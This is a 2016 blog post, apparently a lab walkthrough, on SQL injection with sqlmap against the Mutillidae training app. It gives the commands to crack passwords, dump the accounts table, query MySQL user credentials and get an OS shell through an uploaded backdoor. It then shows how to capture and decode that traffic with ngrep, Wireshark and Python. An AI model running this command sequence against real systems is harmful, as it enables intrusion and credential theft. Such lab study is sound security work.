<!DOCTYPE html>
<html lang="en">

<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="description" content="os-shell access, capture and inspect the payload">
  <meta name="generator" content="Hugo 0.18.1" />

  <title>SQL injection with sqlmap &middot; Technical Notes</title>

  
  
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/pure-min.css">

  <!--[if lte IE 8]>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/grids-responsive-old-ie-min.css">
  <![endif]-->
  <!--[if gt IE 8]><!-->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/grids-responsive-min.css">
  <!--<![endif]-->

  <!--[if lte IE 8]>
  <link rel="stylesheet" href="https://tzyluen.github.io/css/side-menu-old-ie.css">
  <![endif]-->
  <!--[if gt IE 8]><!-->
  <link rel="stylesheet" href="https://tzyluen.github.io/css/side-menu.css">
  <!--<![endif]-->

  <link rel="stylesheet" href="https://tzyluen.github.io/css/blackburn.css">

  
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

  
  <link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet" type="text/css">

  
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-99983797-1', 'auto');
ga('send', 'pageview');
</script>


  
  

  
  <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.1.0/styles/androidstudio.min.css">
  <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.1.0/highlight.min.js"></script>
  <script>hljs.initHighlightingOnLoad();</script>
  

  <link rel="shortcut icon" href="https://tzyluen.github.io/img/favicon.ico" type="image/x-icon" />

  
    <link rel="stylesheet" href="https://tzyluen.github.io/css/my.css">
  
  

</head>


<body>
<div id="layout">

  
<a href="#menu" id="menuLink" class="menu-link">
  
  <span></span>
</a>
<div id="menu">

  
  <a class="pure-menu-heading brand" href="https://tzyluen.github.io/">Notes</a>


  <div class="pure-menu">
    <ul class="pure-menu-list">
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://tzyluen.github.io/"><i class='fa fa-home fa-fw'></i>Home</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://tzyluen.github.io/post/"><i class='fa fa-list fa-fw'></i>Posts</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://tzyluen.github.io/tags/"><i class='fa fa-list fa-fw'></i>Tags</a>
      
        </li>
      
    </ul>
  </div>

  <div class="pure-menu social">
  <ul class="pure-menu-list">

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

  </ul>
</div>


  <div>
  <div class="small-print">
    <small>&copy; 2015. All rights reserved.</small>
  </div>
  <div class="small-print">
    <small>Built with&nbsp;<a href="https://gohugo.io/" target="_blank">Hugo</a></small>
    <small>Theme&nbsp;<a href="https://github.com/yoshiharuyamashita/blackburn" target="_blank">Blackburn</a></small>
  </div>
</div>

</div>


  <div id="main">


<div class="header">
  <h1>SQL injection with sqlmap</h1>
  <h2>os-shell access, capture and inspect the payload</h2>
</div>


<div class="content">

  <div class="post-meta">

  <div>
    <i class="fa fa-calendar fa-fw"></i>
    <time>07 May 2016</time>
  </div>

  

  
  
  
  

  
  
  
  <div>
    <i class="fa fa-tags fa-fw"></i>
    
      <a class="post-taxonomy-tag" href="https://tzyluen.github.io/tags/infosec">infosec</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://tzyluen.github.io/tags/sql">sql</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://tzyluen.github.io/tags/sql-injection">sql-injection</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://tzyluen.github.io/tags/sqlmap">sqlmap</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://tzyluen.github.io/tags/packet-analysis">packet-analysis</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://tzyluen.github.io/tags/ngrep">ngrep</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://tzyluen.github.io/tags/wireshark">wireshark</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://tzyluen.github.io/tags/python">python</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://tzyluen.github.io/tags/vulnerability-scanner">vulnerability-scanner</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://tzyluen.github.io/tags/scanning">scanning</a>
    
  </div>
  
  

</div>

    
    <div id="TableOfContents" class="toc col-lg-offset-6">
      <h2>Table of Contents</h2>
      <nav id="TableOfContents">
<ul>
<li><a href="#scan-for-vulnerability">Scan for vulnerability</a>
<ul>
<li><a href="#create-a-http-request-file">Create a HTTP request file</a></li>
<li><a href="#scan-the-target">Scan the target</a></li>
<li><a href="#explore-the-vulnerable-target-s-databases-and-system">Explore the vulnerable target&rsquo;s databases and system</a>
<ul>
<li><a href="#some-other-commonly-used-options-to-explore-the-system">Some other commonly used options to explore the system:</a></li>
</ul></li>
<li><a href="#os-shell-access">OS Shell Access</a>
<ul>
<li><a href="#behind-the-scene">Behind the scene</a></li>
</ul></li>
<li><a href="#speedup-the-process-and-specify-custom-injection-payloads">Speedup the process and specify custom injection payloads</a></li>
</ul></li>
<li><a href="#capture-and-decode-the-payload">Capture and decode the payload</a>
<ul>
<li><a href="#with-ngrep">with Ngrep</a></li>
<li><a href="#with-wireshark">with Wireshark</a></li>
<li><a href="#decode-the-payload">Decode the payload</a></li>
</ul></li>
</ul>
</nav>
    </div>
    <hr>
    

  

<h1 id="scan-for-vulnerability">Scan for vulnerability</h1>

<h2 id="create-a-http-request-file">Create a HTTP request file</h2>

<ol>
<li><p>Use <code>-r</code> option instead of passing long parameters of <code>--url</code>, <code>--user-agent</code>, etc.</p>

<p><strong>Note:</strong> use packet capture utility such as <code>ngrep</code> to facilitate the process.</p>

<pre><code class="language-text">sqlmap -r REQUESTFILE ...
-r REQUESTFILE      Load HTTP request from a file
</code></pre>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-01.png" alt="sql-injection-with-sqlmap-01" /></p></li>

<li><p>Clean-up the trailing <code>.</code> (non-printable char displayed by <code>ngrep</code>), and write to a file e.g., <code>mutillidae-login.request</code></p>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-02.png" alt="sql-injection-with-sqlmap-02" /></p></li>
</ol>

<h2 id="scan-the-target">Scan the target</h2>

<ol>
<li><p>Launch the scan with the <code>-r</code> and use the request file created above, it will take some time:</p>

<pre><code class="language-bash">$ sqlmap -r -mutillidae-login.request --batch --banner
</code></pre>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-03.png" alt="sql-injection-with-sqlmap-03" /></p></li>

<li><p>Once a vulnerability is found, it will print the parameter that&rsquo;s vulnerable, the injection type, and the payload used to carried out the injection. The following scan results indicate total of three type of injections found.</p>

<ul>
<li>boolean-based blind</li>
<li>error-based</li>
<li>AND/OR time-based blind</li>
</ul>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-04.png" alt="sql-injection-with-sqlmap-04" /></p>

<p><strong>Note:</strong> the <code>--technique</code> option can be used to specifically target one type of attack.</p>

<pre><code class="language-text"> --technique=BEUSTQ,
   B=boolean-based blind, E=error-based, U=union-query-based, S=stacked queries,
   T=time-based blind, Q=inline queries
</code></pre></li>
</ol>

<h2 id="explore-the-vulnerable-target-s-databases-and-system">Explore the vulnerable target&rsquo;s databases and system</h2>

<p>Once entered the system:</p>

<ol>
<li><p>Crack the passwords</p>

<pre><code class="language-bash">$ sqlmap -r mutillidae-login.request --batch --passwords
</code></pre>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-05.png" alt="sql-injection-with-sqlmap-05" /></p></li>

<li><p>List the databases:</p>

<pre><code class="language-bash">$ sqlmap -r mutillidae-login.request --batch --dbs
</code></pre>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-06.png" alt="sql-injection-with-sqlmap-06" /></p></li>

<li><p>List the tables:</p>

<pre><code class="language-bash">$ sqlmap -r mutillidae-login.request --batch --tables -D nowasp
</code></pre>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-07.png" alt="sql-injection-with-sqlmap-07" /></p></li>

<li><p>Dump the <code>nowasp.accounts</code> table:</p>

<pre><code class="language-bash">$ sqlmap -r mutillidae-login.request --batch --dump -T accounts -D nowasp
</code></pre>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-08.png" alt="sql-injection-with-sqlmap-08" /></p></li>
</ol>

<h3 id="some-other-commonly-used-options-to-explore-the-system">Some other commonly used options to explore the system:</h3>

<pre><code class="language-bash">$ sqlmap -r mutillidae-login.request --current-user
$ sqlmap -r mutillidae-login.request --privileges
$ sqlmap -r mutillidae-login.request --dbms=mysql -D mysql --sql-query=&quot;select user,password from mysql.user order by user desc&quot;
</code></pre>

<h2 id="os-shell-access">OS Shell Access</h2>

<p><strong>Note:</strong> see section <a href="#capture-and-decode-the-payload">Capture and decode the payload</a> to retrieve the payloads.</p>

<pre><code class="language-bash">$ sqlmap -r mutillidae-login.request --batch --os-shell
</code></pre>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-09.png" alt="sql-injection-with-sqlmap-09" /></p>

<h3 id="behind-the-scene">Behind the scene</h3>

<p>The file stager (1) <code>tmpuntbv.php</code> is first uploaded to the <code>/var/www/html</code> as explained in section <a href="#capture-and-decode-the-payload">Capture and decode the payload</a>.</p>

<p>Then, the backdoor (2) <code>tmpbyovw.php</code> is uploaded to the server through <code>tmpuntbv.php</code>.</p>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-14.png" alt="sql-injection-with-sqlmap-14" /></p>

<p>All shell commands&rsquo; requests are made through the backdoor script <code>tmpbyovw.php</code> to 192.168.1.9 and results are returned to the 192.168.1.11.</p>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-13.png" alt="sql-injection-with-sqlmap-13" /></p>

<h2 id="speedup-the-process-and-specify-custom-injection-payloads">Speedup the process and specify custom injection payloads</h2>

<p>To speedup the process, pass as many parameters to shorten the processing time. For examples:</p>

<pre><code class="language-bash">-p TESTPARAMETER      Testable parameter(s)
--dbms=DBMS           Force back-end DBMS to this value
--technique=TECH      SQL injection techniques to use (default &quot;BEUSTQ&quot;)
</code></pre>

<hr />

<h1 id="capture-and-decode-the-payload">Capture and decode the payload</h1>

<p>From the sqlmap stdout, pins down the files (payloads) uploaded:</p>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-10.png" alt="sql-injection-with-sqlmap-10" /></p>

<h2 id="with-ngrep">with Ngrep</h2>

<pre><code class="language-bash">$ ngrep -d eth0 -qt -W byline &quot;^GET | ^POST&quot; &quot;port 80 and host 192.168.1.11&quot;
</code></pre>

<p>Look for the files uploaded described above:
<img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-11.png" alt="sql-injection-with-sqlmap-11" /></p>

<h2 id="with-wireshark">with Wireshark</h2>

<p>Use the following filters:</p>

<pre><code class="language-bash">Capture filter: not broadcast and not multicast and host 192.168.1.11
Display filter (1): http contains &quot;tmpuntbv.php&quot;
Display filter (2): http contains &quot;tmpbyovw.php&quot;
</code></pre>

<p>From the matching packet, <code>Follow</code> &rarr; <code>HTTP Stream</code>:</p>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-12.png" alt="sql-injection-with-sqlmap-12" /></p>

<h2 id="decode-the-payload">Decode the payload</h2>

<p>Unquote the url strings with:</p>

<pre><code class="language-python">import sys
import urlparse
import codecs
buf = urlparse.unquote(sys.argv[1])
print buf
</code></pre>

<p>produces,</p>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-15.png" alt="sql-injection-with-sqlmap-15" /></p>

<p>and decodes the hex (starting from <del>0x</del>3c3f&hellip; until &hellip;3e0a) with,</p>

<pre><code class="language-python">payload = sys.argv[1]
print codecs.decode(payload, &quot;hex&quot;)
</code></pre>

<p>produces,</p>

<p><img src="https://tzyluen.github.io/img/sql-injection-with-sqlmap-16.png" alt="sql-injection-with-sqlmap-16" /></p>

<p>the code basically handling file uploads and also change the uploaded files permission to <code>0755</code>.</p>


  
<div class="prev-next-post pure-g">
  <div class="pure-u-1-24" style="text-align: left;">
    
    <a href="https://tzyluen.github.io/post/wireshark-a-quick-troubleshoot-on-slow-network-1/"><i class="fa fa-chevron-left"></i></a>
    
  </div>
  <div class="pure-u-10-24">
    
    <nav class="prev">
      <a href="https://tzyluen.github.io/post/wireshark-a-quick-troubleshoot-on-slow-network-1/">Wireshark: A quick troubleshoot on slow network (1)</a>
    </nav>
    
  </div>
  <div class="pure-u-2-24">
    &nbsp;
  </div>
  <div class="pure-u-10-24">
    
    <nav class="next">
      <a href="https://tzyluen.github.io/post/port-knocking/">Port-knocking</a>
    </nav>
    
  </div>
  <div class="pure-u-1-24" style="text-align: right;">
    
    <a href="https://tzyluen.github.io/post/port-knocking/"><i class="fa fa-chevron-right"></i></a>
    
  </div>
</div>



  

</div>

</div>
</div>
<script src="https://tzyluen.github.io/js/ui.js"></script>




</body>
</html>

